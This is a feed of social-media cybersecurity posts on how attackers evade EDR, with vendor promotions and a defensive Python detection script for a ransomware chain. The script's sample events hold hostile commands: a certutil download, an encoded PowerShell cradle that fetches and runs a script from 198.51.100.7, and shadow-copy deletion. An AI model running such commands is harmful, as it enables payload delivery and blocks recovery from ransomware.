🔓 New EDR Bypass Technique via Direct Disk Reads

📌 Security researchers have identified an innovative method to evade Endpoint Detection and Response (EDR) systems using direct disk read operations. This technique exploits a gap in conventional EDR monitoring, allowing attackers to execute malicious code without being detected.

🔍 How the technique works:
- EDRs traditionally monitor system calls and in-memory activities
- Direct disk read operations often go unnoticed
- Attackers can use these reads to load and execute malicious payloads
- The method avoids API hooks commonly used by EDR solutions

⚠️ Security implications:
- Multiple EDR products could be vulnerable to this approach
- Demonstrates the need to monitor disk-level activities
- Security teams must update their detection capabilities

🛡️ Recommendations:
- Implement monitoring of suspicious disk activities
- Update EDR solutions to detect this type of bypass
- Adopt a defense-in-depth approach

For more information visit: https://enigmasecurity.cl
💙 Support our community to continue sharing relevant security research: https://lnkd.in/er_qUAQh
👥 Let's connect and talk about cybersecurity: https://lnkd.in/eHV6av8t
#EDR #Cybersecurity #ThreatDetection #BypassTechniques #CyberDefense #Infosec #SecurityResearch #EndpointSecurity
📅 Fri, 05 Sep 2025 08:01:46 +0000
🔗 Subscribe to the Membership: https://lnkd.in/eh_rNRyt
🚨 Brinztech Alert: New Technique Allows Hackers to Bypass EDR Using Raw Disk Reads

Security researchers have uncovered a stealthy attack method that bypasses Endpoint Detection and Response (EDR) tools by reading data directly from a raw disk. This technique enables attackers to steal highly sensitive files, such as credential stores, without triggering standard monitoring or logging.

🔍 Why It Matters
- Bypasses EDR & File Permissions: No standard file-access calls, making detection extremely difficult.
- Leaves No Default Logs: Forensic investigations become challenging.
- Multiple Attack Paths: From admin-level access to BYOVD (Bring Your Own Vulnerable Driver) exploits.

✅ Mitigation Strategies
- Implement Full Disk Encryption (e.g., BitLocker).
- Enforce Least Privilege principles.
- Enable Advanced Monitoring for raw disk access (e.g., Sysmon Event ID 9).
- Apply Driver Blocklists to prevent BYOVD attacks.

At Brinztech, we help organizations stay ahead of evolving threats.
📩 Contact us to learn more about our cybersecurity solutions.
For info on this post: https://lnkd.in/e_Ghti-K
#CyberSecurity #EDR #ThreatIntelligence #Brinztech #InfoSec
🔐 Cybersecurity That Never Sleeps: Sophos MDR

In today's threat landscape, reactive security is no longer enough. That's why organizations are turning to Sophos MDR, a fully managed 24/7 threat detection and response service powered by expert analysts and cutting-edge technology.

✅ Why Sophos MDR?
- 24/7/365 monitoring by a global SOC team
- Rapid response to threats with industry-leading SLAs
- Integration with existing security tools and telemetry
- Proactive threat hunting and real-time remediation
- Backed by advanced AI, EDR, SIEM, and SOAR capabilities

Whether you're an SMB or an enterprise, Sophos MDR helps you stay ahead of attackers, even when your team is offline.

💡 Ready to elevate your cybersecurity posture? Let's talk about how Sophos MDR can fit into your strategy.
#CyberSecurity #SophosMDR #ManagedDetectionAndResponse #SOC #ThreatHunting #EDR #SIEM #SOAR #Infosec #ITSecurity #MDR
🔒 How attackers evade EDR and XDR detection: Memory obfuscation techniques 🧠

An in-depth analysis of the techniques cybercriminals use to bypass modern endpoint protection systems. Attackers are developing sophisticated methods that operate directly in memory, avoiding traditional signatures and static analysis.

🧩 Main techniques identified:
- Shellcode injection into legitimate processes using Windows APIs
- Use of direct system calls (syscalls) to avoid EDR hooks
- Code obfuscation in memory using encryption and packing
- Manipulation of the PEB (Process Environment Block) to hide modules
- Fileless attacks that reside entirely in memory

🛡️ Impact on security:
These techniques represent a significant challenge for conventional EDR/XDR solutions, as the malware never touches the disk and uses operating system processes to camouflage itself. Attackers leverage tools like Cobalt Strike and living-off-the-land techniques.

💡 Mitigation recommendations:
- Implement real-time anomalous behavior monitoring
- Use solutions that analyze activity in memory
- Apply principles of least privilege and network segmentation
- Keep security patches up to date
- Train staff in advanced threat detection

For more information visit: https://enigmasecurity.cl
Are you concerned about the evolution of attack techniques?
🎯 Support our community to continue sharing relevant security analysis: https://lnkd.in/er_qUAQh
Let's connect and talk about cybersecurity: https://lnkd.in/eGvmV6Xf
#Cybersecurity #EDR #XDR #ThreatDetection #MemoryAnalysis #CyberDefense #InfoSec #Astralinux #Hacking #CyberThreats
📅 Wed, 03 Sep 2025 12:34:57 GMT
🔗 Subscribe to the Membership: https://lnkd.in/eh_rNRyt
🚨 Zero Networks Advances CISA's Zero Trust Microsegmentation Guidelines 🚨

Microsegmentation has shifted from a niche concept to a critical cybersecurity strategy. According to new EMA research, 96% of security leaders now see it as essential, with the top benefit being the ability to immediately isolate and contain threats. CISA's newly released guidelines reinforce this urgency, placing microsegmentation at the heart of modern Zero Trust architectures to stop lateral movement and block ransomware.

⚡ Zero Networks makes adoption simple:
✔ Automated, agentless, and implemented in days
✔ Dynamic asset discovery & identity segmentation
✔ Integrated MFA at the network level
✔ No complex rule writing or multi-year projects

💬 "With Zero Networks, networks defend themselves from the start. Nothing needs to be found or contained, because attackers can't move or cause damage," said Benny Lakunishok, Managing Director of Zero Networks.

👉 Learn how to implement automated microsegmentation aligned with CISA guidelines: https://lnkd.in/dHigKDhg
👉 Read More: https://shorturl.at/dohdf
#ZeroTrust #Cybersecurity #Microsegmentation #CISA #RansomwareDefense #ZeroNetworks
🔒 Major Shift in Cybersecurity: VirusTotal Launches New Endpoint Solution! 🚨

Here's the breakdown of this game-changing announcement:

🛡️ VirusTotal, the iconic malware analysis service, has officially launched "VirusTotal Endpoint," a new solution that extends its powerful analysis capabilities directly to endpoints.

💻 The new tool installs a lightweight agent on devices, allowing security teams to proactively scan for IOCs (Indicators of Compromise) and suspicious files, pulling from a massive dataset of threat intelligence.

🔍 It enables on-demand scanning and file submission right from the endpoint, providing crucial context and visibility into potential threats that other tools might miss.

🤝 This move integrates its community-powered, multi-engine scanning power into the heart of your defense, layering endpoint data with its global intelligence network for richer insights.

🌐 This evolution signifies a strategic pivot from a primarily reactive analysis tool to a more proactive, intelligence-driven component of an organization's security stack. This fundamentally changes VirusTotal's role from a sandbox to an active defender.

Does this signal the future of integrated threat intelligence, where analysis and endpoint protection become inseparable?

#Cybersecurity #ThreatIntelligence #VirusTotal #EndpointSecurity #InfoSec #CyberDefense #MalwareAnalysis #Innovation
Link: https://lnkd.in/dNnN7Vy5
#cybersecurity #infosec
How attackers evade EDR solutions: Advanced obfuscation and anti-analysis techniques

📊 A detailed technical analysis reveals the methodologies that threat actors use to evade endpoint detection and response (EDR) tools. Cybercriminals employ sophisticated techniques including:
👾 Code obfuscation using multiple layers of encryption and compression
🔄 Use of loaders that download malicious payloads into memory
🔍 Anti-debugging and anti-sandboxing techniques to avoid analysis
📦 Manipulation of legitimate system processes to execute malicious code

💻 These strategies allow malware to evade signature- and behavior-based detections, representing a significant challenge for security teams. Research shows how attackers continuously adapt their methods to stay one step ahead of defenses.

🚨 The growing sophistication of these techniques underscores the need to adopt defense-in-depth approaches that combine multiple layers of security, including continuous monitoring, threat intelligence, and behavior analysis.

For more information visit: https://enigmasecurity.cl
💙 Support our work to continue sharing relevant security analysis: https://lnkd.in/evtXjJTA
👥 Let's connect and talk about cybersecurity: https://lnkd.in/e8MjZ6AZ
#Cybersecurity #EDR #ThreatDetection #CyberDefense #MalwareAnalysis #InfoSec #CyberThreats #SecurityOperations
📅 Tue, 16 Sep 2025 09:32:40 GMT
🔗 Subscribe to the Membership: https://lnkd.in/eh_rNRyt
🔒 New Akira Ransomware Technique Disables EDR and Evades Detection

🔍 The Akira ransomware has evolved its arsenal with a sophisticated technique that allows it to disable EDR (Endpoint Detection and Response) solutions without being detected. This method, recently identified by security researchers, represents a significant challenge for traditional defenses.

📌 Key details of the technique:
- Uses legitimate system processes to load and execute malicious code in memory
- Leverages Windows mechanisms such as LOLBins (Living Off The Land Binaries)
- Evades traditional signatures and static analysis through advanced obfuscation
- Enables the execution of payloads without leaving traces on disk

⚠️ Impact on security:
This evolution demonstrates how threat actors continue to refine their methods to bypass enterprise security controls. Organizations must adopt defense-in-depth strategies that include behavior monitoring and network traffic analysis.

🛡️ Protection recommendations:
- Implement EDR solutions with behavior-based detection capabilities
- Keep security patches updated on all endpoints
- Monitor suspicious activities related to system processes
- Perform regular backups and ensure their offline storage

For more information visit: https://enigmasecurity.cl
#Cybersecurity #Ransomware #EDR #ThreatIntelligence #AkiraRansomware #CyberDefense #InfoSec
Let's connect for more cybersecurity insights: https://lnkd.in/eGvmV6Xf
📅 2025-09-16T12:37:56
🔗 Subscribe to the Membership: https://lnkd.in/eh_rNRyt
🔍 How We Detected a Ransomware Attack in 5 Minutes Using Elastic Security

💡 In today's world, ransomware attacks represent one of the biggest threats to organizations. Detection speed is crucial to minimizing impact.

🚨 Real Case:
We detected a ransomware attack in just 5 minutes from the start of malicious activity. The attacker used living-off-the-land techniques, native system tools, and legitimate processes to evade traditional detection methods.

📊 Tools Used:
- Elastic Security Suite
- Custom Detection Rules
- Process Behavior Analysis
- Real-Time Network Activity Monitoring

🔧 Identified Techniques:
- Use of certutil to download malicious payloads
- Execution of obfuscated PowerShell scripts
- Lateral movement via WMI and SMB
- Activation of ransomware with deletion of volume shadows

✅ Thanks to our behavior-based detection system and specific rules, we were able to:
- Immediately alert the security team
- Isolate compromised devices
- Prevent the spread of ransomware
- Preserve evidence for forensic analysis

📈 Lessons Learned:
- Continuous monitoring is essential
- Detection rules must be updated regularly
- Behavior analysis outperforms traditional signatures
- Rapid response minimizes damage

For more information visit: https://enigmasecurity.cl
💙 Support our work to continue sharing cybersecurity analysis: https://lnkd.in/evtXjJTA
Connect on LinkedIn: https://lnkd.in/g34EbJGn
#Ransomware #Cybersecurity #ElasticSecurity #ThreatDetection #IncidentResponse #CyberDefense #SOC #SecurityOperations #ThreatHunting #CyberAttack
📅 Fri, 29 Aug 2025 13:37:25 GMT
🔗 Subscribe to the Membership: https://lnkd.in/eh_rNRyt
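The four techniques the post lists (certutil download, encoded PowerShell, WMI-spawned shells, shadow-copy deletion) are each a short behavioral rule over process-creation telemetry, and the "5 minutes" comes from correlating them per host rather than from any one of them. The block below is an added example and is not the author's Elastic ruleset: it implements the four rules in Python over constructed events whose keys loosely follow ECS names (`process.name`, `process.command_line`, `process.parent.name`, `host.name`), decodes `-EncodedCommand` payloads so the analyst sees the script rather than base64, and escalates a host when three or more distinct stages land inside a 30-minute window. The sample events, the window and the stage threshold are assumptions.

```python
"""Behavior-based rules for the ransomware chain described above, plus per-host correlation.

Added example. Event keys mimic ECS field names; SAMPLE_EVENTS are constructed,
not real telemetry. Rules run over process-creation records only.
"""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this covers the
# forms seen in the wild most often (-e, -ec, -en, -enc, -encodedcommand).
ENC_FLAG = re.compile(r"(?:^|\s)[-/]e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

SHADOW_PATTERNS = (
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"win32_shadowcopy.*(?:delete|remove)", re.I),
    re.compile(r"bcdedit.*recoveryenabled\s+no", re.I),
)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script (UTF-16LE base64), or None if absent."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def rule_certutil_download(ev):
    cl = ev["process.command_line"].lower()
    if ev["process.name"].lower() == "certutil.exe" and "urlcache" in cl and "http" in cl:
        return "T1105 ingress tool transfer via certutil"
    return None


def rule_encoded_powershell(ev):
    if ev["process.name"].lower() in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(ev["process.command_line"])
        if decoded is not None:
            hint = " (downloader)" if re.search(r"downloadstring|iex|invoke-expression", decoded, re.I) else ""
            return f"T1059.001 encoded PowerShell{hint}: {decoded[:60]}"
    return None


def rule_wmi_lateral(ev):
    # A shell whose parent is the WMI provider host is the classic remote-WMI execution footprint.
    if ev["process.parent.name"].lower() == "wmiprvse.exe" and \
            ev["process.name"].lower() in ("cmd.exe", "powershell.exe", "pwsh.exe"):
        return "T1047 remote WMI execution spawning a shell"
    return None


def rule_shadow_deletion(ev):
    if any(p.search(ev["process.command_line"]) for p in SHADOW_PATTERNS):
        return "T1490 inhibit system recovery (shadow copy deletion)"
    return None


RULES = (rule_certutil_download, rule_encoded_powershell, rule_wmi_lateral, rule_shadow_deletion)


def run_rules(events):
    """Evaluate every rule against every event; one alert per (event, rule) hit, in input order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                alerts.append({"@timestamp": ev["@timestamp"], "host": ev["host.name"],
                               "rule": rule.__name__, "detail": detail})
    return alerts


def correlate(alerts, min_stages=3, window_minutes=30):
    """Escalate hosts where >= min_stages distinct rules fired within the window. Returns {host: [rules]}."""
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["host"]].append(a)
    chains = {}
    for host, items in by_host.items():
        stages = {a["rule"] for a in items}
        times = sorted(datetime.fromisoformat(a["@timestamp"]) for a in items)
        if len(stages) >= min_stages and times[-1] - times[0] <= timedelta(minutes=window_minutes):
            chains[host] = sorted(stages)
    return chains


# Constructed sample: a downloader cradle encoded the way an attacker would pass it to -enc.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')".encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"@timestamp": "2025-08-29T13:30:05", "host.name": "FS01", "process.name": "certutil.exe",
     "process.parent.name": "cmd.exe",
     "process.command_line": r"certutil.exe -urlcache -split -f http://198.51.100.7/p.exe C:\Users\Public\p.exe"},
    {"@timestamp": "2025-08-29T13:31:10", "host.name": "FS01", "process.name": "powershell.exe",
     "process.parent.name": "cmd.exe", "process.command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"@timestamp": "2025-08-29T13:32:40", "host.name": "FS02", "process.name": "cmd.exe",
     "process.parent.name": "WmiPrvSE.exe", "process.command_line": "cmd.exe /c whoami"},
    {"@timestamp": "2025-08-29T13:34:01", "host.name": "FS01", "process.name": "cmd.exe",
     "process.parent.name": "p.exe", "process.command_line": "cmd.exe /c vssadmin.exe delete shadows /all /quiet"},
    {"@timestamp": "2025-08-29T13:34:02", "host.name": "FS01", "process.name": "wmic.exe",
     "process.parent.name": "p.exe", "process.command_line": "wmic shadowcopy delete"},
    # Benign admin activity that must not fire.
    {"@timestamp": "2025-08-29T13:35:00", "host.name": "WS07", "process.name": "powershell.exe",
     "process.parent.name": "explorer.exe", "process.command_line": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    hits = run_rules(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print("escalated:", correlate(hits))
```

Run stand-alone it prints five alerts and escalates only FS01, where the download, the encoded cradle and the shadow deletion co-occur; FS02's lone WMI shell stays a single medium-confidence alert for an analyst to triage. Each rule is deliberately narrow and cheap, which is what makes correlation the useful part: a single encoded PowerShell command fires constantly in many estates, three stages of the same chain on one host within minutes does not.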
How attackers evade EDR detection using memory obfuscation techniques

A new technical analysis reveals advanced methods that cybercriminals are using to bypass endpoint detection and response (EDR) solutions. These sophisticated techniques allow malware to operate undetected in corporate environments.

🧠 Main techniques identified:
- Direct manipulation of kernel objects to hide malicious activity
- Use of undocumented Windows APIs to avoid security hooks
- Obfuscation of system calls through trampolining techniques
- Manipulation of critical operating system data structures
- Implementation of direct code execution in unsupervised memory regions

🛡️ Security implications:
These methods represent a significant challenge for traditional EDR solutions, as they allow attackers to execute malicious code without generating detectable alerts or events. The cybersecurity community must develop more advanced countermeasures that monitor behavior at a deeper system level.

💡 Recommendations:
- Implement kernel integrity monitoring
- Use solutions that analyze behavior beyond API hooks
- Keep security patches updated
- Adopt defense-in-depth approaches

For more information visit: https://enigmasecurity.cl
Did you find this information useful? Support our community to continue sharing threat intelligence analysis. Your donation makes this work possible: https://lnkd.in/evtXjJTA
Let's connect and talk about cybersecurity: https://lnkd.in/g34EbJGn
#EDRSecurity #ThreatIntelligence #CyberDefense #MemoryObfuscation #EndpointSecurity #MalwareAnalysis #CyberSecurity #InfoSec
📅 Sun, 14 Sep 2025 11:46:48 GMT
🔗 Subscribe to the Membership: https://lnkd.in/eh_rNRyt